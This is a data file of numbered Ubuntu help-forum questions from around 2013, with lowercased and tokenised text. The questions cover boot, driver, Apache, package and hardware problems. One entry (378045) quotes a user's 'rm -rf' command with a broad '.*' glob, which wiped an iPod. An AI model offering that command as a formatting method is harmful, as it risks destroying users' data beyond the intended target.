378009	how do i block everything on a user account , except firefox ?	i 'm trying out ubuntu on some work pcs , but i 'd like everything to be blocked on the users account , except firefox and flash player . essentially a parental controls application , but for the system/applications .
378010	grub not appearing at windows 8.1 and ubuntu 13.10 dual boot	i installed ubuntu 13.10 after windows 8.1 and grub is not appearing . i tried what is in this topic , but it does n't work for me . can you help me ?
378012	problem kernel panic - not syncing : fatal exception in interrupt drm_kms_helper:	i 'm having a problem with my dell inspiron 1564 , i am getting this error : problem kernel panic - not syncing : fatal exception in interrupt drm_kms_helper : : panic occurred , switching back to text console i 've found that it is probably due to the broadcomm sta wireless driver . but i am not sure how to solve the issue , does anyone know what i should do/try ?
378014	ubuntu 13.10 ca n't drag a window up to another screen	i am having ubuntu 13.04 and 13.10 . i have no problem with 13.04 in 13.10 i found that , when i tried to drag my window up across my standard dual-screen setup , it gets jammed/stopped when it goes as high as the top menu bar and wo n't go higher into my other screen that 's configured from system-settings- > displays to be right above the current one . in another word , my external monitor is positioned as above my internal laptop 's screen , and i 'm trying to drag my window up from my laptop screen into my external monitor screen . dragging a window in reverse direction , e.g . down from external screen to my laptop screen is totaly fine . i disabled maximizing at top screen edge ( from ccsm ) but still window wo n't drag up through the lower screen 's top edge . i thought this might be related to some kind of snapping but i do n't see any options for this in compiz-config . could this be about unity 's menu bar ? or anything else ?
378015	can not find drive after installing ubuntu	installed ubuntu 12.04 on my system . created a partition of 30gb for the os and left the other 130 gb to store my data , pics and stuff . installation went fine , but now i can not see my other drive ( 130 gb ) i can see 130 gb free space on `` disk utility '' , but it shows capacity of 30gb only i donâtknow how to access the 130gb partition to transfer my data form a external hard drive . note : i have just ubuntu installed on my system , no dual os .
378017	problem with apache 2.4.6 on ubuntu 13.10 no rewrite for wordpress links	my rewrite was working well until i updated my apache and than went dead . my 000-default.conf < virtualhost *:80 > # the servername directive sets the request scheme , hostname and port that # the server uses to identify itself . this is used when creating # redirection urls . in the context of virtual hosts , the servername # specifies what hostname must appear in the request 's host : header to # match this virtual host . for the default virtual host ( this file ) this # value is not decisive as it is used as a last resort host regardless . # however , you must set it for any further virtual host explicitly . # servername www.example.com serveradmin webmaster @ localhost documentroot /var/www < directory `` /var/www '' > order allow , deny allow from all allowoverride fileinfo # new directive needed in apache 2.4.3 : require all granted < /directory > # available loglevels : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the loglevel for particular # modules , e.g . # loglevel info ssl : warn errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined # for most configuration files from conf-available/ , which are # enabled or disabled at a global level , it is possible to # include a line for only one particular virtual host . for example the # following line enables the cgi configuration for this host only # after it has been globally disabled with `` a2disconf '' . # include conf-available/serve-cgi-bin.conf < /virtualhost > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet my .htaccess < ifmodule mod_rewrite.c > rewriteengine on rewritebase /blog/ rewriterule ^index\.php $ - [ l ] rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule . /blog/index.php [ l ] < /ifmodule > i would like to use if possible the default localhost and have mod rewrite thank you for any help .
378018	mouse flickering and disappearing at bottom half of the screen after upgrade to 13.10	irrespective of the program , the mouse pointer flickers most of the time at an unstable rate , often disappears completely then comes back flickering . 80-90 % of the time disappears over web pages ( tried both chromium and firefox ) making browsing and ordering things online a total nightmare . i actually have to move the mouse little by little each time , seeing what gets highlighted in the web page so that i can guess where the cursor is , then move the mouse a little again , and repeat until i get it over the link or button i want to click . after rebooting the cursor is working ok for the first 3-4 minutes and then starts flashing gradually more and more until it is unusable . once the problem is in full effect , i have also noticed that the cursor tend to be visible more often on the top half of the screen ! so i actually make most browser windows occupy the top half of the screen , in an attempt to be able to use the page . i saw some similar bug reports about the gnome daemon settings , but the proposed work around did n't work for me , plus the problem is not the same . for example i ran : gsettings set org.gnome.settings-daemon.plugins.cursor active false nothing changed . this problem is so basic and incredibly annoying that i am thinking of switching away from ubuntu . any pointers ? ( pun intended )
378019	ca n't open terminal from one of the user accounts	i have a administrator account in which if i open the terminal , it like shows up for a fraction of a second and then vanishes . i tried with guest and other user accounts ( created from this one ) . i was able to open terminal . what is the problem ? how to open terminal properly from my main account ? i am not even able to do anything on the screen that comes on ctrl+alt+f1 . over there , i put my login id and then password then suddenly some text comes there and the next second , vanishes . asking me to login again
378021	how to log in as root in xubuntu 12.04	i am new to the world of linux and i 've installed a xubuntu 12.04 on my desktop computer . i am learning web development ( php , html , css , javascript , jquery etc ... ) so i need to establish an apache server on my machine . with synaptic package manager i already installed some packages that seem to work so when i type localhost to my browser it gives an html site that says : '' it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . '' i have read a few things on the internet on this topic , and now i know that i should be able to write my php in documents that are stored in filesystem/var/www/ but i can not create documents in there - apparently because i am not logged in as root . could somebody help me with that ? also please note that i have very little ( if any at all ) knowledge of linux so please make it comprehesnible for such an uninitiated user as i am .
378024	issue with suspend	i 've been wanting to use ubuntu on my laptop along side with windows , and i have tried 12.04 lte , 13.04 , and now currently 13.10 ( 64-bit ) . i 'm using a toshiba satellite , but i have had an issue everytime . when closing my laptop lid , it will go into suspend mode , like normal , but when resuming , it turns the laptop fan on full power , and will no longer go into suspend mode when closing the lid , unless i reboot . ( basically , everytime i boot up ubuntu , i get to put it in suspend mode once ) . if there is any code fix , i can do that , i 'm familiar with adding and changing lines of code .
378027	problems with apt-get install : permission denied	i have been having trouble with installation when ever i type apt-get install < file name > it replies with e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directoy ( /var/lib/dpkg ) , are you root what should i do ?
378034	13.10 did install did not configure peripherals proplerly	originally running 13.04 . tried update to 13.10 with too little free disk space . 13.10 update terminated prematurely due to lack of space . used usb image to run gparted and create more space . ran boot-repair . could successfully boot into both the partially updated 13.10 partition and the w7 partition . reinstalled 13.10 from usb now can not use trackpad have to start terminal session sudo reboot is there anything i should try before starting a clean install ? i would like to be able to restore previously installed applications if i can , but i already have the key data backed up . since i posted this i connected to the network and ran 'sudo apt-get update ' . this repaired the bad modules though it was not enough to keep my additional applications .
378037	how to see a list of the keyboard shortcuts ?	for example , how can i find out what keys switch between multiple terminal windows ? i 'm trying to use the keyboard more and more and the mouse less . if i have multiple windows open i can use ialt-tab to switch between them . by default it starts to select the 'next ' application window but i found that if i hold it down for 2 seconds it will stay on the terminal window and allow me to switch between terminal windows . this is what i 'm looking for . is there a way to be able to switch between windows - either through the multi-pane approach above or by cycling through the windows - without using the above approach with the 2 second delay . it would be great if there was a way to do something like ctrl-tab or shiftalttab i am not looking for split-window or tab windows or tmux pane solutions . i already use these and this is a separate issue that i like to know if there is any options to address this need . keyboard manager settings shows the below but does n't seem to help me . also keyboard shortcuts shows : but alt-f6 does n't work
378040	smplayer hides mouse cursor permanently	in 13.10 , smplayer ( and kmplayer and kplayer ) hides the mouse pointer - permanently - it happens when start playing any video , and never comes back even after the program quits . the cursor can be brought back by switching to console and then back to x-windows . to test if this was a mplayer problem , i tested using just the mplayer with same video - no problem . gnome-mplayer is also work fine , but i 'd really prefer smplayer if this can be fixed..
378042	problem installing ubuntu as dual boot on hp probook 4530s	i have the two files .iso , the installer of 12.04 - 64 bits and 13.10 - 64 bits . i want to set you up ubuntu , and have it alongdide windows 7 . i tried to install ubuntu 12.04.3 lts 64-bit . but i do n't get the option to install alongside windows 7 . i could not try ubuntu 13.10 . so i guess it will be same as 12.04 lts , extra facts : model : hp probook 4530s oem - system : no video card : intel graphics chipset 3000 current system : windows 7 ultimate 64-bit ( cd provided by a friend ) original partitions : yes , hp_recovery and hp_tools , i 've never formatted , are just as they came , with their data and all is something missing ? how can i fix this ?
378043	any tool to set the display resolution into custom size ?	i am using one hd display machine from teamviewer and my laptop does not support that resolution therefore it is really eye tiring to try . now i need to change the resolution to that remote machine into my laptop 's . is there any tool to do that . as i see , native tool does not support custom sizing . would you suggest if there exist ?
378045	repair a corrupted ipod shuffle	i have a ipod shuffle 4th generation 2gb . i wanted to format it and i run this command : rm -rf /media/ipod/* /media/ipod/ . * that removed anything from it . then i ejected my ipod from the computer , and inserted it again . i tried amarok , gtkpod and noise to reinitialize it ... noise ouputs this in terminal : [ _log_level_fatal 20:02:48.209188 ] ipoddevice.vala:62 : error parsing db at file : ///media/ipod : could n't find an ipod database on /media/ipod . [ _log_level_fatal 20:02:48.209274 ] music will not function properly . while amarok says `` ipod was not initialized : failed to initialize the ipod '' outputting this in the terminal : qdir : :mkdir : empty or null file name ( s ) x error : badwindow ( invalid window parameter ) 3 major opcode : 20 ( x_getproperty ) resource id : 0x3400192 i do n't care if i lose any ipod songs ( what songs if i formated it ? ) . i want to repair it and to use it under ubuntu . how can i do this ? when i start my ipod i hear a voice in the headphones : `` please use itunes to sync music with this ipod . ''
378046	how to run ubuntu/xubuntu in a complete non-gui mode	i am looking for how to run ubuntu/xubuntu in a complete non-gui mode . like when the system starts up , it needs to login into console . that is all , no loading of any display manager , x server , gui based app support , nothing in the background as well for gui . it is like a totally terminal based entry into the system . please help me understand how to do this ? and how to revert it also ? thanks , harish pathangay
378051	ubuntu 13.10 compatible with an asus u46e-bal6 ?	if i remember correctly , the 12 series of ubuntu had some issues with the asus u46e-bal6 -- how is 13.10 working , anyone know ? i 'm starting to have some issues with windows 7 , and i have no desire to upgrade to windows 8 . giving serious consideration to returning to a dual boot set up with ubuntu . anything i should know going in with my current hardware ? thanks !
378055	how to make a file or folder undeletable ?	i want to make a file or folder undeletable , even the superuser ca n't be able to delete that file.chattr command makes a file undeletable only if the files were in linux filesystems ( ext2 , ext4 ) . but i want to make a file undeletable which was present in ntfs filesystem .
378056	error using fluidsynth	i installed fluidsynth following the instructions here : http : //sourceforge.net/apps/trac/fluidsynth/wiki/download ... which were just sudo apt-get install fluidsynth but get the following error when i try to run it and am unable to access it from python : $ fluidsynth fluidsynth version 1.1.5 copyright ( c ) 2000-2011 peter hanappe and others . distributed under the lgpl license . soundfont ( r ) is a registered trademark of e-mu systems , inc . can not connect to server socket err = no such file or directory can not connect to server socket jackdmp 1.9.8 copyright 2001-2005 paul davis and others . copyright 2004-2011 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details can not create thread 1 operation not permitted can not create thread 1 operation not permitted can not create thread 1 operation not permitted jack server starting in realtime mode with priority 10 can not lock down 82246176 byte memory area ( can not allocate memory ) control device hw:0 control device hw:0 audio_reservation_init acquire audio card audio0 creating alsa driver ... hw:0|hw:0|1024|2|44100|0|0|nomon|swmeter|-|32bit control device hw:0 configuring for 44100hz , period = 1024 frames ( 23.2 ms ) , buffer = 2 periods alsa : final selected sample format for capture : 32bit integer little-endian alsa : use 2 periods for capture alsa : final selected sample format for playback : 32bit integer little-endian alsa : use 2 periods for playback can not use real-time scheduling ( rr/10 ) ( 1 : operation not permitted ) acquireselfrealtime error can not lock down 82246176 byte memory area ( can not allocate memory ) can not use real-time scheduling ( rr/5 ) ( 1 : operation not permitted ) jackclient : :acquireselfrealtime error type 'help ' for help topics .
378060	unzip command is archiving instead of extracting	i m trying to unzip `` data.zip '' into the current directory using : unzip data.zip but i get a prompt : archive : data.zip replace /home/jaggib/data.zip ? [ y ] es , [ n ] o , [ a ] ll , [ n ] one , [ r ] ename : ' it looks to me that it is creating archive instead of uncompressing it . i tried to specify a destination directory , but that gives the same result . i am using ubuntu 13.10 . am not following the syntax correctly or is there an additional argument that i have to use .
378061	resize gripper is not showed	i created this window with glade : http : //bazaar.launchpad.net/~costales/gui-ufw/gufw-14.04/view/head : /data/ui/gufw.ui it has the resize gripper to true ( the default ) : but it is not showing the resize gripper : any idea please ? thanks in advance !
378062	wifi working but bluetooth styas desabled on hp envy	hello to the community i have recently bought an hp envy laptop and managed to keep the dual boot windows8/ubuntu 12.04 lts my wifi works just fine with no tweaking needed ... it worked directly out of the box on both os while the bluetooth in ubuntu does not get enabled . my rfkill list gives me this output $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no i 'm totally new to ubuntu , but very fond of the concept ! thanks in advance lozo
378065	how to configure cgminer to mine with the cpu ?	i installed the cgminer to try to get into a bitcoin mining pool , but i have no gpu . i know that mining with the cpu is not very eficient , but i want to know how to configure cgminer to mine with the cpu ? because i just want to test it . i installed the cgminer by the ubuntu software center .
378067	lvm - how is data allocated between disk	its quite possible i did n't understand what i was doing when i set it up , but ... ok , i bought three 2tb drives that i wanted to use for media storage . i did n't want to deal with figuring out which files to put in which drive , so i googled `` how to span disks '' and discovered lvm . fine , easy enough ... so now i have one 6tb `` drive '' mounted as a ext4 filesystem at /mnt/bigdisk everything seems fine , but as i 'm now approaching 2tb usage , i started to wonder the following : 1 ) how is the data being allocated ? does each drive now have 1/3 of 2tb ? or is one almost full ? how can i see it ? 2 ) what happens when one ( or more ) disk is getting near the limit and i add a file large enough that it has to cross disks ? an error , or does it just `` handle it '' ? thanks .
378068	ubuntu 13.10 wo n't upgrade to flash 11.2 // logout , restart , and shut down not works	i just upgraded to 13.10 saucy salamander about 2 nights ago . i upgraded through 13.04 and it was not a clean install . i am thinking maybe the internet connection did not work towards the end of the upgrade but even after that using terminal remove and reinstall flash does not work . i have the latest tar.gz file but need some guidance in installing it ? help ! also , when trying to shut down , restart , or even log out ( for some reason , suspend works ) the menu does not come up at all until i physically press the power button on my tower and then it brings up the menu . how can i fix this issue ?
378069	pydev not found in eclipse kepler eclipse says it 's correctly installed	i suppose it 's a similar problem as this question , but i was asked to file a separate question , because my problem is python-3-related . situation : ubuntu 12.04 64bit , python 3.2.3 , installing eclipse ( kepler ) and pydev . problem : can not configure pydev , can not create python project . same procedure on windows 7 works fine . i followed the guidelines at http : //pydev.org/manual_101_install.html , but neither `` install new software '' nor via the `` eclipse marketplace '' did work , i.e . i do n't see any python or pydev entry in window/preferences . well , it seems to be installed , because eclipse says `` already installed '' , if i try to install it again . from the command line python is working : $ python python 3.2.3 ( default , sep 25 2013 , 18:22:43 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > i tried to link python to python2.7 in /usr/bin but with no effort . does anyone have an idea yet ? edit : java -version says `` 1.6.0_27 ''
378070	dell latitude xt2 wireless driver and touchscreen settings keep reverting	i am new to ubuntu and using a dell latitude xt2 . when installed ubuntu there was a problem with my wireless drivers . after looking around a bit i managed to fix it with the following commands : sudo apt-get purge bcmwl-kernel-source & & sudo apt-get install firmware-b43-installer then : sudo apt-get install bcmwl-kernel-source with a wired internet connection . my touchscreen was also causing me problems so i tried to turn it off with : xinput set-prop 'n-trig multitouch ' 'device enabled ' 0 which again works . my problem is everything reverts when i turn my laptop off so i am currently having to do this every time i turn it on . is there anyway to fix this ?
378071	stop .py opening in gedit ?	i have been trying to get a .py file to open in the interpreter instead of in gedit and feel like i 'm banging my head off a wall . i have selected `` allow executing file as program '' in permission ( it was already on to begin with ) . i have also ensured that `` # ! /usr/bin/python '' is at the top of the file . i have also chmod +x `` script.py '' i am unsure what else to try , everything i have been reading has suggested this should work . but it still open 's in gedit everytime the only way i can get this file to run is via terminal using either ./script.py or python script.py commands . i am mostly a windows user and only tend to use linux for testing purposes so please bear with me in your responses as i am not an expert on this by any means . thanks for any advice you can give . will
378075	which ubuntu to go with ?	i 'm really stuck into which ubuntu i should choose . i 'm stuck between 12.04 , 12.10 , 13.04 , 13.10 . i have used 12.10 before but wondering if that was the right choice . i 'll be dual booting with windows but ubuntu will be on a separate drive . system specs : i5 3570k 560ti 1gb corsair 8gb 1600mhz 64 bit architecture asus p8z77 v-lk any help in deciding would be greatly appreciated
378078	ca n't set default application for ipod	i 'm in the middle of following this guide to using my ipod with amarok . but at the section where i set my ipod to use amarok as the default program , when i set it to use amarok in the gui and press ok when it returns it says that i selected shotwell no matter how many times i try and regardless of rebooting or retrying the connection . i do n't know if i very sufficiently described what happened but i was wondering if anyone knows why the default program thing is n't working properly and either : a . know how to make it stop or b . know another way to set the default program for my ipod .
378082	ubuntu 13.04 low graphics mode	yesterday i upgraded my perfectly working ubuntu 12.04 to 12.10 and while booting for the first time , a window appeared saying it had to boot in low graphics mode because of not finding my configuration . in hopes of overcoming this problem , i upgraded through terminal to 13.04 butthe window still appears . i 've tried many things such as reinstalling driver , modifying greeter entry and such , but nothing seems to work . i 'm currently running an hp pavilion dv4 with amd athlon x2 processor and ati hd 3200 graphics . please help me , i 'm quite desperate .
378085	newly ubuntunized windows laptop - best way to connect to internet ?	i 'm very happy with the conversion of my windows vista panasonic cf19 toughbook to ubuntu . touchscreen works great . bluetooth connectivity great . the whole new-to-ubuntu experience is going pretty well thank you ! ... only problem is ... i 'm still connecting to network router via cable ( as my old usb dongle connection no longer works ) please advise your best ideas for connecting wirelessly to the net . do purpose built linux mini-dongles exist ? any help greatly appreciated !
378087	wacom tablet intuos cth480s do n't work	i am running on ubuntu 12.04 ( 64bit ) . i bought a wacom intuos tablet cth-480s . it seems recognized when prompted lsusb , 'id 056a : 0302 wacom co. , ltd. ' appears . but it does not work . manager settings for wacom tablet is installed , but does not detect tablet . thank you for your help , i do not know where to start . săšbastien
378089	right alt selects text on the right instead of entering an alternative character	i have the following problem . my keyboard works just fine in editors like vim or libreoffice , but i ca n't make it work in google-chrome . whenever i type something in a form and i want to use special characters ( i 'm polish , so i use them quite a lot ) , after pressing alt the whole form gets selected and when i press the key i wanted to insert it deletes the whole text leaving me with the letter i just inserted only . i tried changing settings of my keyboard but it does not work . the only workaroud i found so far is to press alt and while holding it press ► and than the letter ( for the input to get unselected and not deleted ) . do you guys have any idea what is wrong ? eidt : today i found , that the problem only exists on some webpages like : search bar on facebook , or jakdojade.pl . the alternative characters enter perfectly on google etc .
378090	ca n't download vcrun2008 winhttp wininet with winetricks	i 'm trying to play roblox on ubuntu , but for some reason this error message keeps on appearing : http request sent , awaiting response ... 404 not found 2013-11-16 14:31:45 error 404 : not found . downloading http : //download.microsoft.com/download/ie5/update/1/win98/en-us/3725.exe failed does anyone know what to do ? i 'm using winetricks with this command : winetricks -q vcrun2008 winhttp wininet i do n't know what to do .
378092	ca n't start installed ubuntu on partition	i have make partition for ubuntu opened installer successfully installed ubuntu to right partition and restarted . but then i ca n't open another os than w 8.1 . ubuntu version 13.10 raring ringtail *computer : acer aspire v5-552g *clockwork speed:2.9/3.5 *memory:8gb *hdd:500gb
378094	deleted partition in windows and created new partition but want to recover data back ? urgent	by mistake i have deleted wrong partition . and now created partition from that unallocated space . is there any way to get all data back ? i have tried to recover data by stellar phoenix but unable to recover . any one can help me ?
378095	how to hide desktop icons ubuntu 13.10 ?	how should i hide all of the desktop icons , in ubuntu 13.10 ?
378096	dell n5040 bluetooth not working	10 runnning solely on a dell n5040 laptop . how do i enable bluetooth , it works fine on windows 7 when i had it installed but ive never been able to get it working in any ubuntu version from 12.04 onwards . ive tried installing the bluetooth support and bluetooth manager from software center , and running the setup files from dell website for my machine through wine but nothing works . in system settings/bluetooth it wont let me select on for bluetooth and theres no icon in system tray . any help would be greatly appreciated . thanks in advance , billy
378100	ca n't login to guest account in ubuntu	after installing fglrx drivers i can not login to my ubuntu ( both admin and guest accounts ) but after removing ~/.xauthority file i can log in to my admin account. , but still ca n't login to my guest account . ( when i click on login ( guest ) , i 'm getting back to the login page ) what should i do ?
378105	ubuntu 13.10 x64 skype	fresh install ubuntu 13.10 x64 : no skype in software center , no mouse speed adjustment ... i have tried numerous terminal tricks , following amatory blogs . p
378111	ubunto newbie needs suggestions	i have a netbook ( no cd drive ) and i currently run windows 7 on but i want to convert to something new . here re my specs . processor : amd athlon neo processor mv-40 1.60ghz ram : 4gb ( 2.97 useable ) system type : 32-bit i managed to install 7 on it via bootable usb drive . so can anyone suggest what will run good ? all i really use my pc for is minor photo editing , browsing , and playing music .
378113	unity desktop does n't redraw correctly	this started to happen after i replaced nautilus with nemo as default file explorer . is there any remedy ?
378115	kernel panic - unable to install 12.04 again	i have got kernel panic vfs not syncing error . i am trying to install ubuntu 12.04 again through live usb but it is not working . what steps should i take ? i have checked my harddisk through bios and it 's showing the correct size . i am using dell inspiron n5010 , i3 , 3gb ram .
378121	reboot and select proper boot device	recently i deleted my windows 7 os and i decided to install ubuntu 12.04 lts on my computer . two times i booted my pc and i get the message ''reboot and select proper boot device '' . i put the live cd inside and i reboot but i get the same message . when i turn it off and leave it for about 40 minutes turned off and i restart it again everything is okay . i can log in to ubuntu perfectly . do you know why this might happen ? by the way the reason i rebooted my pc was because i wanted to fix with the live cd some bad sectors that the smart self test found . i 've got a toshiba satellite c-660 d amd v140 processor os type 64 bit disk 244 gb
378122	what does the `` commands '' scope do ?	in ubuntu 13.10 there is a `` commands '' scope . i was wondering what this one filters for and where i can read about what it does .
378123	how to copy from terminal without trailing spaces ?	at least sometimes when i copy text from gnome-terminal i get the text padded with spaces : '0123456789012345678901234567890123456789012345678901234567890123456789 ' instead of '0123456789012345678901234567890123456789012345678901234567890123456789' is there a way to stop it ?
378125	how can i apply additional boot parameters ? ( using livecd )	i 'm having the same issue as franz here : can not install ubuntu ( 13.04 / 12.04 ) due to ext4 error cubiq advises adding pci=noaer , nomsi to the `` boot string '' and franz comments that this piece of command seems to solve the issue . my question is : how can i do that ? i 'm using an ubuntu 12.04 disk and booting the os straight from it . when on the ubuntu desktop , i opened a terminal window and typed sudo reboot pci=noar , nomsi and ( of course ) it did n't work . what am i doing wrong here . how can i boot with that command being active ? needless to say , i 'm new to ubuntu . any help would be appreciated . p.s . : as briefly stated above , i 'm loading the system from the cd . i have one unknown partition ( sda1 ) ; one extended ( sda2 ) ; and one linux-swap ( sda5 ) - gparted info .
378130	how to set ubuntu cluster ?	so i have 4 regular desktop pc 's that i would like to cluster together . the simplest way would be to set os on it and connect them via gigabit ethernet cable together . but , since i only have a limited number of network cards it is only possible to get one pc on the net and the rest plug into that one that can be visible from the net . this is cool but as soon as i need to get some new libraries this becomes a problem . so is there some tutorial how to set ubuntu cluster . furthermore is there a way that all my cpu 's are visible from my front so that i do n't need to set a grid job distributor ? any tutorials or suggestions ( regarding ubuntu cluster solutions ) are welcomed
378134	ubuntu packaging guide tutorial : there seems to be no makefile in this directory	i am attempting to package a simple video game for distribution on the ubuntu software center . i have been working through the ubuntu packaging guide tutorial . i have succeeded in creating my gpg and ssh keys , getting them registered , getting set up with launchpad , and registering the keys with launchpad . i skipped 1.3 - 1.5 fixing bugs ( kdetoys ) of the tutorial and went straight to 1.6 packaging new software ( hello ) . i was able to download the package , extract it , configure it , make it , and install it , such that the command hello now returns `` hello world ! '' from there i ran bzr dh-make hello 2.9 hello-2.9.tar.gz which created a folder called `` hello '' . i have made the suggested changes to the contents of the `` hello '' folder and committed the changes using bzr commit . then , when i run : bzr builddeb -- -us -uc it does a bunch of stuff and then i get : dh clean dh_testdir dh_auto_clean make [ 1 ] : entering directory /build-area/hello-2.9' there seems to be no makefile in this directory . you must run ./configure before running 'make ' . make [ 1 ] : *** [ abort-due-to-no-makefile ] error 1 make [ 1 ] : leaving directory /build-area/hello-2.9' dh_auto_clean : make -j1 distclean returned exit code 2 make : *** [ clean ] error 29 dpkg-buildpackage : error : fakeroot debian/rules clean gave error exit status 2 debuild : fatal error at line 1350 : dpkg-buildpackage -rfakeroot -d -us -uc failed bzr : error : the build failed . i am using ubuntu 12.04 ( 32-bit ) . i have created a github repo of the `` hello '' folder in case anyone would be willing to peek at the changes i made to the package and see if i have configured something incorrectly . perhaps i need to install a component which i skipped in sections 1.3 - 1.5 ? any suggestions will be appreciated .
378135	locating missing files for user account	i have 5 user accounts on my machine , which is running 12.04 on a 500gb hdd . the main admin account ( called homeuser ) has lost all its files after a sd card was pulled from the machine without ejecting first . the account homeusers is still present but its profile appears to have defaulted to the standard ubuntu setup and all the data ( approx 450gb ) is missing . the machine was n't backed up ( as it was only used for downloading and web surfing ) , however recently i backed up a lot of photos from another portable hdd that was showing errors . the portable hdd has since failed and now i ca n't see any of the data on my machine . the system is now showing only 12 % of the hdd used . how to get the data back ?
378137	computer does not boot from dvd	i 'm new to ubuntu . my os is xp service pack 3 . i downloaded ubuntu 12.04.3 32bit iso file . i burnt it to a dvd . i put the dvd in my dvd drive and rebooted the computer . the install routine does not start and the computer boots to my xp desktop . i assumed the installer would automatically start . do i need to go into the bios and tell computer to boot from the dvd with the iso file ?
378138	proprietary devices not working	well i downloaded ubuntu 13.10 , booted and installed drom the usb flash memory . before installing it i was using the try ubuntu option and everything was fine . after the installation i 'm trying to connect to a wifi , but it is n't even putting a single one of the wifi network near my house . i googled a little and then went to the additional drives thing , it is reading the wireless and the gpu too . google stuff said that i have to set it from the open source to the proprieatry option however when i click and press apply changes , it goes back to the open source option . what should i do to fix this ?
378139	how do i get iperf on a ubuntu 13.10 live disc ?	i have ubuntu 13.10 running from a live dvd disc . unfortunately it does not include the iperf tool , so it will need to be added separately . i already tried the command below . apt-get install iperf it returns an error . i think it has something to do with sources . root @ ubuntu : / # apt-get install iperf reading package lists ... done building dependency tree reading state information ... done e : unable to locate package iperf root @ ubuntu : / # by using pico /etc/apt/sources.list this is what i get . deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main restricted deb http : //archive.ubuntu.com/ubuntu/ saucy main restricted deb http : //security.ubuntu.com/ubuntu/ saucy-security main restricted deb http : //archive.ubuntu.com/ubuntu/ saucy-updates main restricted i see there 's a `` cdrom '' entry in there . is it looking for iperf on the dvd and when it fails to find it returns that error ? what about those urls listed below it , is it ever looking for iperf in those locations ? do i have to do something about the sources file to fix this ? or is this caused by something else ? i found some instructions on how to manually compile and install iperf . but that failed at the step where i 'm supposed to run make install clean and iperf is still not installed . the whole purpose of using the ubuntu live disc is to run iperf . so i need this thing up and running . please advise , what do i need to do ? update 1 - adding the `` universe '' repository as suggested , i tried adding the universe repository . but that did n't work . i know the solution i listed as my own answer works . but i wanted an easier way to do this so i rebooted and issued the following commands . ubuntu @ ubuntu : ~ $ pico /etc/apt/sources.list ubuntu @ ubuntu : ~ $ sudo pico /etc/apt/sources.list ubuntu @ ubuntu : ~ $ pico /etc/apt/sources.list ubuntu @ ubuntu : ~ $ sudo apt-get update e : type 'http : //archive.ubuntu.com/ubuntu/raring/universe ' is not known on line 5 in source list /etc/apt/sources.list e : the list of sources could not be read . ubuntu @ ubuntu : ~ $ i used the pico editor and added the following line at the end of the file . http : //archive.ubuntu.com/ubuntu/raring/universe amd64 packages i could n't write it out at first , because of permissions . so i had to use sudo and this is what it looks like now . deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy $ deb http : //archive.ubuntu.com/ubuntu/ saucy main restricted deb http : //security.ubuntu.com/ubuntu/ saucy-security main restricted deb http : //archive.ubuntu.com/ubuntu/ saucy-updates main restricted http : //archive.ubuntu.com/ubuntu/raring/universe amd64 packages do i need the extra space in front of `` raring '' ? and do i need to begin the line `` deb '' ? it was not specified in the instruction .
378140	problems re-installing ubuntu	i previously uninstalled the operating system `` ubuntu 12.10 32 bit '' , and now it is not available to boot from . i am trying to install `` ubuntu 12.04 64 bit '' and i am having quite a hassle doing so . i downloaded the iso file from the download page and then i used unetbtin to convert my flash drive into a live drive . after booting up my computer from the flash drive it gave me the usual default try ubuntu without installing install ubuntu check disk for errors check memory ^ that 's from memory , it 's not exactly what the list says . i noticed something odd though ; these options were shown twice stacked upon each other . i have n't taken much thought to it and continued to the `` install ubuntu '' . from there , i have many problems . i ca n't connect to a wifi , and whenever i try continuing installation it gives me errors with the option to `` quit , continue , retry '' and saying that if i continue it is possible that my installation could be ruined or broke if retrying does n't work . after closing the installation it gives me an error of : `` warning : 0 bits of space are available check your memory and delete unnecessary files '' . this boggles me because i bought this computer originally with 600gb of memory . but after installing ubuntu 12.10 32 bit , it says i only have about 400gb which 200gb is shared by windows . but 0 bits of memory can not be right . so i did a disk error check and it came out to saying 1 error was found . with that in mind i cleared the entire flash drive once more and tried creating the iso file on my flash drive again . -- same double list , and same errors again . so now i am very confused and have not the slightest ideas of how to fix this . what i do think is , is that the partition from the first installation has n't be freed , and ubuntu 12.10 is still some where in the computer , just not active . thanks , any one who can help .
378144	ntfs / windows partitions disappeared after updating ubuntu from 13.04 to 13.10	i updated ubuntu 13.04 to 13.10 from the live cd downloaded and then on restart i did n't have anymore the windows line in the grub menu and then while in ubuntu i could n't find my other partitions at all . actually , now the old partitions are gone and i have just one big ubuntu partition . i do n't care about the windows , but i need the data from my second ntfs partition that i had . can someone help me to recover that ( to restore the old partitions ) ? thank you
378145	how to make the directory stack unchanged ?	pushd command adds a directory to a directory stack and change the path to that directory . if i run the commands , pushd /etc pushd /usr pushd /bin and the output of dirs command is , /bin /usr /etc ~ once the current terminal was closed , all the values stored in the directory stack was deleted.even if i run dirs command on new terminal , it shows nothing..i want the above directory stack to be remain unchanged even if i close the current terminal and reopen a new one.is that possible ? any help will be appreciated
